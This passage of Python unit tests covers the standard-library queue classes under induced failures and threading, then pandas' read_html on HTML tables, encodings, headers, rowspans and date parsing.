            def __init__(self, *args):
                self.fail_next_put = False
                self.fail_next_get = False
                Queue.__init__(self, *args)
            def _put(self, item):
                if self.fail_next_put:
                    self.fail_next_put = False
                    raise FailingQueueException("You Lose")
                return Queue._put(self, item)
            def _get(self):
                if self.fail_next_get:
                    self.fail_next_get = False
                    raise FailingQueueException("You Lose")
                return Queue._get(self)

        self.FailingQueue = FailingQueue

        super().setUp()

    def failing_queue_test(self, q):
        # Drive q through failing and succeeding puts/gets, checking after
        # each induced failure that the queue's state was not corrupted.
        if q.qsize():
            raise RuntimeError("Call this function with an empty queue")
        for i in range(QUEUE_SIZE-1):
            q.put(i)
        # Test a failing non-blocking put.
        q.fail_next_put = True
        try:
            q.put("oops", block=0)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        q.fail_next_put = True
        try:
            q.put("oops", timeout=0.1)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        q.put("last")
        self.assertTrue(qfull(q), "Queue should be full")
        # Test a failing blocking put
        q.fail_next_put = True
        try:
            self.do_blocking_test(q.put, ("full",), q.get, ())
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        # Check the Queue isn't damaged.
        # put failed, but get succeeded - re-add
        q.put("last")
        # Test a failing timeout put
        q.fail_next_put = True
        try:
            self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get,
                                              (), FailingQueueException)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        # Check the Queue isn't damaged.
        # put failed, but get succeeded - re-add
        q.put("last")
        self.assertTrue(qfull(q), "Queue should be full")
        q.get()
        self.assertTrue(not qfull(q), "Queue should not be full")
        q.put("last")
        self.assertTrue(qfull(q), "Queue should be full")
        # Test a blocking put
        self.do_blocking_test(q.put, ("full",), q.get, ())
        # Empty it
        for i in range(QUEUE_SIZE):
            q.get()
        self.assertTrue(not q.qsize(), "Queue should be empty")
        q.put("first")
        q.fail_next_get = True
        try:
            q.get()
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        self.assertTrue(q.qsize(), "Queue should not be empty")
        q.fail_next_get = True
        try:
            q.get(timeout=0.1)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        self.assertTrue(q.qsize(), "Queue should not be empty")
        q.get()
        self.assertTrue(not q.qsize(), "Queue should be empty")
        q.fail_next_get = True
        try:
            self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
                                              FailingQueueException)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        # put succeeded, but get failed.
        self.assertTrue(q.qsize(), "Queue should not be empty")
        q.get()
        self.assertTrue(not q.qsize(), "Queue should be empty")

    def test_failing_queue(self):
        # Test to make sure a queue is functioning correctly.
        # Done twice to the same instance.
        q = self.FailingQueue(QUEUE_SIZE)
        self.failing_queue_test(q)
        self.failing_queue_test(q)


class PyFailingQueueTest(FailingQueueTest, unittest.TestCase):
    queue = py_queue


@need_c_queue
class CFailingQueueTest(FailingQueueTest, unittest.TestCase):
    queue = c_queue


class BaseSimpleQueueTest:
    """Shared tests for SimpleQueue; subclasses set self.type2test/self.queue."""

    def setUp(self):
        self.q = self.type2test()

    def feed(self, q, seq, rnd):
        # Producer: pop values from the shared seq (list.pop is atomic) and
        # put them on q, sleeping randomly to shuffle thread interleavings.
        while True:
            try:
                val = seq.pop()
            except IndexError:
                return
            q.put(val)
            if rnd.random() > 0.5:
                time.sleep(rnd.random() * 1e-3)

    def consume(self, q, results, sentinel):
        # Consumer: blocking get() until the sentinel is seen.
        while True:
            val = q.get()
            if val == sentinel:
                return
            results.append(val)

    def consume_nonblock(self, q, results, sentinel):
        # Consumer: spin on get(block=False), sleeping briefly when empty.
        while True:
            while True:
                try:
                    val = q.get(block=False)
                except self.queue.Empty:
                    time.sleep(1e-5)
                else:
                    break
            if val == sentinel:
                return
            results.append(val)

    def consume_timeout(self, q, results, sentinel):
        # Consumer: spin on get(timeout=...) until a value arrives.
        while True:
            while True:
                try:
                    val = q.get(timeout=1e-5)
                except self.queue.Empty:
                    pass
                else:
                    break
            if val == sentinel:
                return
            results.append(val)

    def run_threads(self, n_feeders, n_consumers, q, inputs,
                    feed_func, consume_func):
        # Run feeders and consumers concurrently over q; one sentinel per
        # consumer terminates consumption.  Returns the consumed values.
        results = []
        sentinel = None
        seq = inputs + [sentinel] * n_consumers
        seq.reverse()
        rnd = random.Random(42)

        exceptions = []
        def log_exceptions(f):
            # Record any thread exception; unittest can't see it otherwise.
            def wrapper(*args, **kwargs):
                try:
                    f(*args, **kwargs)
                except BaseException as e:
                    exceptions.append(e)
            return wrapper

        feeders = [threading.Thread(target=log_exceptions(feed_func),
                                    args=(q, seq, rnd))
                   for i in range(n_feeders)]
        consumers = [threading.Thread(target=log_exceptions(consume_func),
                                      args=(q, results, sentinel))
                     for i in range(n_consumers)]

        with support.start_threads(feeders + consumers):
            pass

        self.assertFalse(exceptions)
        self.assertTrue(q.empty())
        self.assertEqual(q.qsize(), 0)

        return results

    def test_basic(self):
        # Basic tests for get(), put() etc.
        q = self.q
        self.assertTrue(q.empty())
        self.assertEqual(q.qsize(), 0)
        q.put(1)
        self.assertFalse(q.empty())
        self.assertEqual(q.qsize(), 1)
        q.put(2)
        q.put_nowait(3)
        q.put(4)
        self.assertFalse(q.empty())
        self.assertEqual(q.qsize(), 4)

        self.assertEqual(q.get(), 1)
        self.assertEqual(q.qsize(), 3)
        self.assertEqual(q.get_nowait(), 2)
        self.assertEqual(q.qsize(), 2)
        self.assertEqual(q.get(block=False), 3)
        self.assertFalse(q.empty())
        self.assertEqual(q.qsize(), 1)
        self.assertEqual(q.get(timeout=0.1), 4)
        self.assertTrue(q.empty())
        self.assertEqual(q.qsize(), 0)

        with self.assertRaises(self.queue.Empty):
            q.get(block=False)
        with self.assertRaises(self.queue.Empty):
            q.get(timeout=1e-3)
        with self.assertRaises(self.queue.Empty):
            q.get_nowait()
        self.assertTrue(q.empty())
        self.assertEqual(q.qsize(), 0)

    def test_negative_timeout_raises_exception(self):
        q = self.q
        q.put(1)
        with self.assertRaises(ValueError):
            q.get(timeout=-1)

    def test_order(self):
        # Test a pair of concurrent put() and get()
        q = self.q
        inputs = list(range(100))
        results = self.run_threads(1, 1, q, inputs, self.feed, self.consume)
        # One producer, one consumer => results appended in well-defined order
        self.assertEqual(results, inputs)

    def test_many_threads(self):
        # Test multiple concurrent put() and get()
        N = 50
        q = self.q
        inputs = list(range(10000))
        results = self.run_threads(N, N, q, inputs, self.feed, self.consume)
        # Multiple consumers without synchronization append the
        # results in random order
        self.assertEqual(sorted(results), inputs)

    def test_many_threads_nonblock(self):
        # Test multiple concurrent put() and get(block=False)
        N = 50
        q = self.q
        inputs = list(range(10000))
        results = self.run_threads(N, N, q, inputs,
                                   self.feed, self.consume_nonblock)
        self.assertEqual(sorted(results), inputs)

    def test_many_threads_timeout(self):
        # Test multiple concurrent put() and get(timeout=...)
        N = 50
        q = self.q
        inputs = list(range(1000))
        results = self.run_threads(N, N, q, inputs,
                                   self.feed, self.consume_timeout)
        self.assertEqual(sorted(results), inputs)

    def test_references(self):
        # The queue should lose references to each item as soon as
        # it leaves the queue.
        class C:
            pass

        N = 20
        q = self.q
        for i in range(N):
            q.put(C())
        for i in range(N):
            wr = weakref.ref(q.get())
            self.assertIsNone(wr())


class PySimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):

    queue = py_queue

    def setUp(self):
        self.type2test = self.queue._PySimpleQueue
        super().setUp()


@need_c_queue
class CSimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase):

    queue = c_queue

    def setUp(self):
        self.type2test = self.queue.SimpleQueue
        super().setUp()

    def test_is_default(self):
        self.assertIs(self.type2test, self.queue.SimpleQueue)
        self.assertIs(self.type2test, self.queue.SimpleQueue)

    def test_reentrancy(self):
        # bpo-14976: put() may be called reentrantly in an asynchronous
        # callback.
        q = self.q
        gen = itertools.count()
        N = 10000
        results = []

        # This test exploits the fact that __del__ in a reference cycle
        # can be called any time the GC may run.

        class Circular(object):
            def __init__(self):
                self.circular = self

            def __del__(self):
                q.put(next(gen))

        while True:
            o = Circular()
            q.put(next(gen))
            del o
            results.append(q.get())
            if results[-1] >= N:
                break

        self.assertEqual(results, list(range(N + 1)))


if __name__ == "__main__":
    unittest.main()
test_html.py
from functools import partial
from importlib import reload
from io import BytesIO, StringIO
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError

import numpy as np
import pytest

from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td

from pandas import (
    DataFrame,
    MultiIndex,
    Series,
    Timestamp,
    date_range,
    read_csv,
    to_datetime,
)
import pandas._testing as tm

from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html

HERE = os.path.dirname(__file__)


@pytest.fixture(
    params=[
        "chinese_utf-16.html",
        "chinese_utf-32.html",
        "chinese_utf-8.html",
        "letz_latin1.html",
    ]
)
def html_encoding_file(request, datapath):
    """Parametrized fixture for HTML encoding test filenames."""
    return datapath("io", "data", "html_encoding", request.param)


def assert_framelist_equal(list1, list2, *args, **kwargs):
    # Two frame lists match when they have equal length, every element is a
    # DataFrame, and corresponding (non-empty) frames compare equal.
    assert len(list1) == len(list2), (
        "lists are not of equal size "
        f"len(list1) == {len(list1)}, "
        f"len(list2) == {len(list2)}"
    )
    msg = "not all list elements are DataFrames"
    both_frames = all(
        map(
            lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
            list1,
            list2,
        )
    )
    assert both_frames, msg
    for frame_i, frame_j in zip(list1, list2):
        tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
        assert not frame_i.empty, "frames are both empty"


@td.skip_if_no("bs4")
def test_bs4_version_fails(monkeypatch, datapath):
    # read_html must refuse to use bs4 versions older than the minimum.
    import bs4

    monkeypatch.setattr(bs4, "__version__", "4.2")
    with pytest.raises(ImportError, match="Pandas requires version"):
        read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")


def test_invalid_flavor():
    url = "google.com"
    flavor = "invalid flavor"
    msg = r"\{" + flavor + r"\} is not a valid set of flavors"

    with pytest.raises(ValueError, match=msg):
        read_html(url, match="google", flavor=flavor)


@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
def test_same_ordering(datapath):
    # NOTE(review): this definition continues beyond the visible chunk.
    filename =
datapath("io", "data", "html", "valid_markup.html") dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"]) dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"]) assert_framelist_equal(dfs_lxml, dfs_bs4) @pytest.mark.parametrize( "flavor", [ pytest.param("bs4", marks=td.skip_if_no("bs4")), pytest.param("lxml", marks=td.skip_if_no("lxml")), ], scope="class", ) class TestReadHtml: @pytest.fixture(autouse=True) def set_files(self, datapath): self.spam_data = datapath("io", "data", "html", "spam.html") self.spam_data_kwargs = {} self.spam_data_kwargs["encoding"] = "UTF-8" self.banklist_data = datapath("io", "data", "html", "banklist.html") @pytest.fixture(autouse=True, scope="function") def set_defaults(self, flavor, request): self.read_html = partial(read_html, flavor=flavor) yield def test_to_html_compat(self): df = ( tm.makeCustomDataframe( 4, 3, data_gen_f=lambda *args: np.random.rand(), c_idx_names=False, r_idx_names=False, ) .applymap("{:.3f}".format) .astype(float) ) out = df.to_html() res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0] tm.assert_frame_equal(res, df) @pytest.mark.xfail(reason="Html file was removed") @tm.network def test_banklist_url_positional_match(self): url = "https://www.fdic.gov/bank/individual/failed/banklist.html" # Passing match argument as positional should cause a FutureWarning. 
with tm.assert_produces_warning(FutureWarning): df1 = self.read_html( url, "First Federal Bank of Florida", attrs={"id": "table"} ) with tm.assert_produces_warning(FutureWarning): df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"}) assert_framelist_equal(df1, df2) @pytest.mark.xfail(reason="Html file was removed") @tm.network def test_banklist_url(self): url = "https://www.fdic.gov/bank/individual/failed/banklist.html" df1 = self.read_html( url, match="First Federal Bank of Florida", attrs={"id": "table"} ) df2 = self.read_html(url, match="Metcalf Bank", attrs={"id": "table"}) assert_framelist_equal(df1, df2) @tm.network def test_spam_url(self): url = ( "https://raw.githubusercontent.com/pandas-dev/pandas/master/" "pandas/tests/io/data/html/spam.html" ) df1 = self.read_html(url, match=".*Water.*") df2 = self.read_html(url, match="Unit") assert_framelist_equal(df1, df2) @pytest.mark.slow def test_banklist(self): df1 = self.read_html( self.banklist_data, match=".*Florida.*", attrs={"id": "table"} ) df2 = self.read_html( self.banklist_data, match="Metcalf Bank", attrs={"id": "table"} ) assert_framelist_equal(df1, df2) def test_spam(self): df1 = self.read_html(self.spam_data, match=".*Water.*") df2 = self.read_html(self.spam_data, match="Unit") assert_framelist_equal(df1, df2) assert df1[0].iloc[0, 0] == "Proximates" assert df1[0].columns[0] == "Nutrient" def test_spam_no_match(self): dfs = self.read_html(self.spam_data) for df in dfs: assert isinstance(df, DataFrame) def test_banklist_no_match(self): dfs = self.read_html(self.banklist_data, attrs={"id": "table"}) for df in dfs: assert isinstance(df, DataFrame) def test_spam_header(self): df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0] assert df.columns[0] == "Proximates" assert not df.empty def test_skiprows_int(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1) df2 = self.read_html(self.spam_data, match="Unit", skiprows=1) assert_framelist_equal(df1, df2) def 
test_skiprows_range(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2)) df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2)) assert_framelist_equal(df1, df2) def test_skiprows_list(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2]) df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1]) assert_framelist_equal(df1, df2) def test_skiprows_set(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2}) df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1}) assert_framelist_equal(df1, df2) def test_skiprows_slice(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1) df2 = self.read_html(self.spam_data, match="Unit", skiprows=1) assert_framelist_equal(df1, df2) def test_skiprows_slice_short(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2)) df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2)) assert_framelist_equal(df1, df2) def test_skiprows_slice_long(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5)) df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1)) assert_framelist_equal(df1, df2) def test_skiprows_ndarray(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2)) df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2)) assert_framelist_equal(df1, df2) def test_skiprows_invalid(self): with pytest.raises(TypeError, match=("is not a valid type for skipping rows")): self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf") def test_index(self): df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0) df2 = self.read_html(self.spam_data, match="Unit", index_col=0) assert_framelist_equal(df1, df2) def test_header_and_index_no_types(self): df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0) df2 = self.read_html(self.spam_data, 
match="Unit", header=1, index_col=0) assert_framelist_equal(df1, df2) def test_header_and_index_with_types(self): df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0) df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0) assert_framelist_equal(df1, df2) def test_infer_types(self): # 10892 infer_types removed df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0) df2 = self.read_html(self.spam_data, match="Unit", index_col=0) assert_framelist_equal(df1, df2) def test_string_io(self): with open(self.spam_data, **self.spam_data_kwargs) as f: data1 = StringIO(f.read()) with open(self.spam_data, **self.spam_data_kwargs) as f: data2 = StringIO(f.read()) df1 = self.read_html(data1, match=".*Water.*") df2 = self.read_html(data2, match="Unit") assert_framelist_equal(df1, df2) def test_string(self): with open(self.spam_data, **self.spam_data_kwargs) as f: data = f.read() df1 = self.read_html(data, match=".*Water.*") df2 = self.read_html(data, match="Unit") assert_framelist_equal(df1, df2) def test_file_like(self): with open(self.spam_data, **self.spam_data_kwargs) as f: df1 = self.read_html(f, match=".*Water.*") with open(self.spam_data, **self.spam_data_kwargs) as f: df2 = self.read_html(f, match="Unit") assert_framelist_equal(df1, df2) @tm.network def test_bad_url_protocol(self): with pytest.raises(URLError): self.read_html("git://github.com", match=".*Water.*") @tm.network @pytest.mark.slow def test_invalid_url(self): try: with pytest.raises(URLError): self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*") except ValueError as e: assert "No tables found" in str(e) @pytest.mark.slow def test_file_url(self): url = self.banklist_data dfs = self.read_html( file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"} ) assert isinstance(dfs, list) for df in dfs: assert isinstance(df, DataFrame) @pytest.mark.slow def test_invalid_table_attrs(self): url = self.banklist_data with 
pytest.raises(ValueError, match="No tables found"): self.read_html( url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"} ) def _bank_data(self, *args, **kwargs): return self.read_html( self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs ) @pytest.mark.slow def test_multiindex_header(self): df = self._bank_data(header=[0, 1])[0] assert isinstance(df.columns, MultiIndex) @pytest.mark.slow def test_multiindex_index(self): df = self._bank_data(index_col=[0, 1])[0] assert isinstance(df.index, MultiIndex) @pytest.mark.slow def test_multiindex_header_index(self): df = self._bank_data(header=[0, 1], index_col=[0, 1])[0] assert isinstance(df.columns, MultiIndex) assert isinstance(df.index, MultiIndex) @pytest.mark.slow def test_multiindex_header_skiprows_tuples(self): df = self._bank_data(header=[0, 1], skiprows=1)[0] assert isinstance(df.columns, MultiIndex) @pytest.mark.slow def test_multiindex_header_skiprows(self): df = self._bank_data(header=[0, 1], skiprows=1)[0] assert isinstance(df.columns, MultiIndex) @pytest.mark.slow def test_multiindex_header_index_skiprows(self): df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0] assert isinstance(df.index, MultiIndex) assert isinstance(df.columns, MultiIndex) @pytest.mark.slow def test_regex_idempotency(self): url = self.banklist_data dfs = self.read_html( file_path_to_url(os.path.abspath(url)), match=re.compile(re.compile("Florida")), attrs={"id": "table"}, ) assert isinstance(dfs, list) for df in dfs: assert isinstance(df, DataFrame) def test_negative_skiprows(self): msg = r"\(you passed a negative value\)" with pytest.raises(ValueError, match=msg): self.read_html(self.spam_data, match="Water", skiprows=-1) @tm.network def test_multiple_matches(self): url = "https://docs.python.org/2/" dfs = self.read_html(url, match="Python") assert len(dfs) > 1 @tm.network def test_python_docs_table(self): url = "https://docs.python.org/2/" dfs = self.read_html(url, match="Python") 
zz = [df.iloc[0, 0][0:4] for df in dfs] assert sorted(zz) == sorted(["Repo", "What"]) def test_empty_tables(self): """ Make sure that read_html ignores empty tables. """ html = """ <table> <thead> <tr> <th>A</th> <th>B</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>2</td> </tr> </tbody> </table> <table> <tbody> </tbody> </table> """ result = self.read_html(html) assert len(result) == 1 def test_multiple_tbody(self): # GH-20690 # Read all tbody tags within a single table. result = self.read_html( """<table> <thead> <tr> <th>A</th> <th>B</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>2</td> </tr> </tbody> <tbody> <tr> <td>3</td> <td>4</td> </tr> </tbody> </table>""" )[0] expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"]) tm.assert_frame_equal(result, expected) def test_header_and_one_column(self): """ Don't fail with bs4 when there is a header and only one column as described in issue #9178 """ result = self.read_html( """<table> <thead> <tr> <th>Header</th> </tr> </thead> <tbody> <tr> <td>first</td> </tr> </tbody> </table>""" )[0] expected = DataFrame(data={"Header": "first"}, index=[0]) tm.assert_frame_equal(result, expected) def test_thead_without_tr(self): """ Ensure parser adds <tr> within <thead> on malformed HTML. """ result = self.read_html( """<table> <thead> <tr> <th>Country</th> <th>Municipality</th> <th>Year</th> </tr> </thead> <tbody> <tr> <td>Ukraine</td> <th>Odessa</th> <td>1944</td> </tr> </tbody> </table>""" )[0] expected = DataFrame( data=[["Ukraine", "Odessa", 1944]], columns=["Country", "Municipality", "Year"], ) tm.assert_frame_equal(result, expected) def test_tfoot_read(self): """ Make sure that read_html reads tfoot, containing td or th. 
Ignores empty tfoot """ data_template = """<table> <thead> <tr> <th>A</th> <th>B</th> </tr> </thead> <tbody> <tr> <td>bodyA</td> <td>bodyB</td> </tr> </tbody> <tfoot> {footer} </tfoot> </table>""" expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"]) expected2 = DataFrame( data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"] ) data1 = data_template.format(footer="") data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>") result1 = self.read_html(data1)[0] result2 = self.read_html(data2)[0] tm.assert_frame_equal(result1, expected1) tm.assert_frame_equal(result2, expected2) def test_parse_header_of_non_string_column(self): # GH5048: if header is specified explicitly, an int column should be # parsed as int while its header is parsed as str result = self.read_html( """ <table> <tr> <td>S</td> <td>I</td> </tr> <tr> <td>text</td> <td>1944</td> </tr> </table> """, header=0, )[0] expected = DataFrame([["text", 1944]], columns=("S", "I")) tm.assert_frame_equal(result, expected) @pytest.mark.slow def test_banklist_header(self, datapath): from pandas.io.html import _remove_whitespace def try_remove_ws(x): try: return _remove_whitespace(x) except AttributeError: return x df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[ 0 ] ground_truth = read_csv( datapath("io", "data", "csv", "banklist.csv"), converters={"Updated Date": Timestamp, "Closing Date": Timestamp}, ) assert df.shape == ground_truth.shape old = [ "First Vietnamese American BankIn Vietnamese", "Westernbank Puerto RicoEn Espanol", "R-G Premier Bank of Puerto RicoEn Espanol", "EurobankEn Espanol", "Sanderson State BankEn Espanol", "Washington Mutual Bank(Including its subsidiary Washington " "Mutual Bank FSB)", "Silver State BankEn Espanol", "AmTrade International BankEn Espanol", "Hamilton Bank, NAEn Espanol", "The Citizens Savings BankPioneer Community Bank, Inc.", ] new = [ "First Vietnamese American Bank", "Westernbank Puerto Rico", 
"R-G Premier Bank of Puerto Rico", "Eurobank", "Sanderson State Bank", "Washington Mutual Bank", "Silver State Bank", "AmTrade International Bank", "Hamilton Bank, NA", "The Citizens Savings Bank", ] dfnew = df.applymap(try_remove_ws).replace(old, new) gtnew = ground_truth.applymap(try_remove_ws) converted = dfnew._convert(datetime=True, numeric=True) date_cols = ["Closing Date", "Updated Date"] converted[date_cols] = converted[date_cols].apply(to_datetime) tm.assert_frame_equal(converted, gtnew) @pytest.mark.slow def test_gold_canyon(self): gc = "Gold Canyon" with open(self.banklist_data) as f: raw_text = f.read() assert gc in raw_text df = self.read_html( self.banklist_data, match="Gold Canyon", attrs={"id": "table"} )[0] assert gc in df.to_string() def test_different_number_of_cols(self): expected = self.read_html( """<table> <thead> <tr style="text-align: right;"> <th></th> <th>C_l0_g0</th> <th>C_l0_g1</th> <th>C_l0_g2</th> <th>C_l0_g3</th> <th>C_l0_g4</th> </tr> </thead> <tbody> <tr> <th>R_l0_g0</th> <td> 0.763</td> <td> 0.233</td> <td> nan</td> <td> nan</td> <td> nan</td> </tr> <tr> <th>R_l0_g1</th> <td> 0.244</td> <td> 0.285</td> <td> 0.392</td> <td> 0.137</td> <td> 0.222</td> </tr> </tbody> </table>""", index_col=0, )[0] result = self.read_html( """<table> <thead> <tr style="text-align: right;"> <th></th> <th>C_l0_g0</th> <th>C_l0_g1</th> <th>C_l0_g2</th> <th>C_l0_g3</th> <th>C_l0_g4</th> </tr> </thead> <tbody> <tr> <th>R_l0_g0</th> <td> 0.763</td> <td> 0.233</td> </tr> <tr> <th>R_l0_g1</th> <td> 0.244</td> <td> 0.285</td> <td> 0.392</td> <td> 0.137</td> <td> 0.222</td> </tr> </tbody> </table>""", index_col=0, )[0] tm.assert_frame_equal(result, expected) def test_colspan_rowspan_1(self): # GH17054 result = self.read_html( """ <table> <tr> <th>A</th> <th colspan="1">B</th> <th rowspan="1">C</th> </tr> <tr> <td>a</td> <td>b</td> <td>c</td> </tr> </table> """ )[0] expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"]) tm.assert_frame_equal(result, 
        expected)

    def test_colspan_rowspan_copy_values(self):
        # GH17054
        # In ASCII, with lowercase letters being copies:
        #
        # X x Y Z W
        # A B b z C
        result = self.read_html(
            """
            <table>
                <tr>
                    <td colspan="2">X</td>
                    <td>Y</td>
                    <td rowspan="2">Z</td>
                    <td>W</td>
                </tr>
                <tr>
                    <td>A</td>
                    <td colspan="2">B</td>
                    <td>C</td>
                </tr>
            </table>
            """,
            header=0,
        )[0]

        expected = DataFrame(
            data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
        )
        tm.assert_frame_equal(result, expected)

    def test_colspan_rowspan_both_not_1(self):
        # GH17054
        # In ASCII, with lowercase letters being copies:
        #
        # A B b b C
        # a b b b D
        result = self.read_html(
            """
            <table>
                <tr>
                    <td rowspan="2">A</td>
                    <td rowspan="2" colspan="3">B</td>
                    <td>C</td>
                </tr>
                <tr>
                    <td>D</td>
                </tr>
            </table>
            """,
            header=0,
        )[0]

        expected = DataFrame(
            data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
        )
        tm.assert_frame_equal(result, expected)

    def test_rowspan_at_end_of_row(self):
        # GH17054
        # In ASCII, with lowercase letters being copies:
        #
        # A B
        # C b
        result = self.read_html(
            """
            <table>
                <tr>
                    <td>A</td>
                    <td rowspan="2">B</td>
                </tr>
                <tr>
                    <td>C</td>
                </tr>
            </table>
            """,
            header=0,
        )[0]

        expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
        tm.assert_frame_equal(result, expected)

    def test_rowspan_only_rows(self):
        # GH17054
        # A table consisting solely of rowspan cells still yields the
        # repeated rows.
        result = self.read_html(
            """
            <table>
                <tr>
                    <td rowspan="3">A</td>
                    <td rowspan="3">B</td>
                </tr>
            </table>
            """,
            header=0,
        )[0]

        expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
        tm.assert_frame_equal(result, expected)

    def test_header_inferred_from_rows_with_only_th(self):
        # GH17054
        # Leading rows containing only <th> cells become a MultiIndex header.
        result = self.read_html(
            """
            <table>
                <tr>
                    <th>A</th>
                    <th>B</th>
                </tr>
                <tr>
                    <th>a</th>
                    <th>b</th>
                </tr>
                <tr>
                    <td>1</td>
                    <td>2</td>
                </tr>
            </table>
            """
        )[0]

        columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
        expected = DataFrame(data=[[1, 2]], columns=columns)
        tm.assert_frame_equal(result, expected)

    def test_parse_dates_list(self):
        # parse_dates accepts both column positions and column names
        df = DataFrame({"date": date_range("1/1/2001", periods=10)})
        expected = df.to_html()
        res = self.read_html(expected, parse_dates=[1], index_col=0)
        tm.assert_frame_equal(df, res[0])
        res = self.read_html(expected, parse_dates=["date"], index_col=0)
        tm.assert_frame_equal(df, res[0])

    def test_parse_dates_combine(self):
        # parse_dates={new_name: [cols]} combines several columns into one
        raw_dates = Series(date_range("1/1/2001", periods=10))
        df = DataFrame(
            {
                "date": raw_dates.map(lambda x: str(x.date())),
                "time": raw_dates.map(lambda x: str(x.time())),
            }
        )
        res = self.read_html(
            df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
        )
        newdf = DataFrame({"datetime": raw_dates})
        tm.assert_frame_equal(newdf, res[0])

    def test_wikipedia_states_table(self, datapath):
        # Smoke test against a real-world Wikipedia table snapshot.
        data = datapath("io", "data", "html", "wikipedia_states.html")
        assert os.path.isfile(data), f"{repr(data)} is not a file"
        assert os.path.getsize(data), f"{repr(data)} is an empty file"
        result = self.read_html(data, match="Arizona", header=1)[0]
        assert result.shape == (60, 12)
        assert "Unnamed" in result.columns[-1]
        assert result["sq mi"].dtype == np.dtype("float64")
        assert np.allclose(result.loc[0, "sq mi"], 665384.04)

    def test_wikipedia_states_multiindex(self, datapath):
        # Same page without header= -> hierarchical (2-level) columns.
        data = datapath("io", "data", "html", "wikipedia_states.html")
        result = self.read_html(data, match="Arizona", index_col=0)[0]
        assert result.shape == (60, 11)
        assert "Unnamed" in result.columns[-1][1]
        assert result.columns.nlevels == 2
        assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)

    def test_parser_error_on_empty_header_row(self):
        # Asking for more header rows than the table provides raises.
        msg = (
            r"Passed header=\[0,1\] are too many "
            r"rows for this multi_index of columns"
        )
        with pytest.raises(ParserError, match=msg):
            self.read_html(
                """
                <table>
                    <thead>
                        <tr><th></th><th></tr>
                        <tr><th>A</th><th>B</th></tr>
                    </thead>
                    <tbody>
                        <tr><td>a</td><td>b</td></tr>
                    </tbody>
                </table>
                """,
                header=[0, 1],
            )

    def test_decimal_rows(self):
        # GH 12907
        # Custom decimal separator is honored during numeric conversion.
        result = self.read_html(
            """<html>
            <body>
                <table>
                    <thead>
                        <tr>
                            <th>Header</th>
                        </tr>
                    </thead>
                    <tbody>
                        <tr>
                            <td>1100#101</td>
                        </tr>
                    </tbody>
                </table>
            </body>
            </html>""",
            decimal="#",
        )[0]
        expected = DataFrame(data={"Header": 1100.101}, index=[0])
        assert result["Header"].dtype == np.dtype("float64")
        tm.assert_frame_equal(result, expected)

    def test_bool_header_arg(self):
        # GH 6114
        # header= must be row index/indices, never a bool.
        for arg in [True, False]:
            with pytest.raises(TypeError):
                self.read_html(self.spam_data, header=arg)

    def test_converters(self):
        # GH 13461
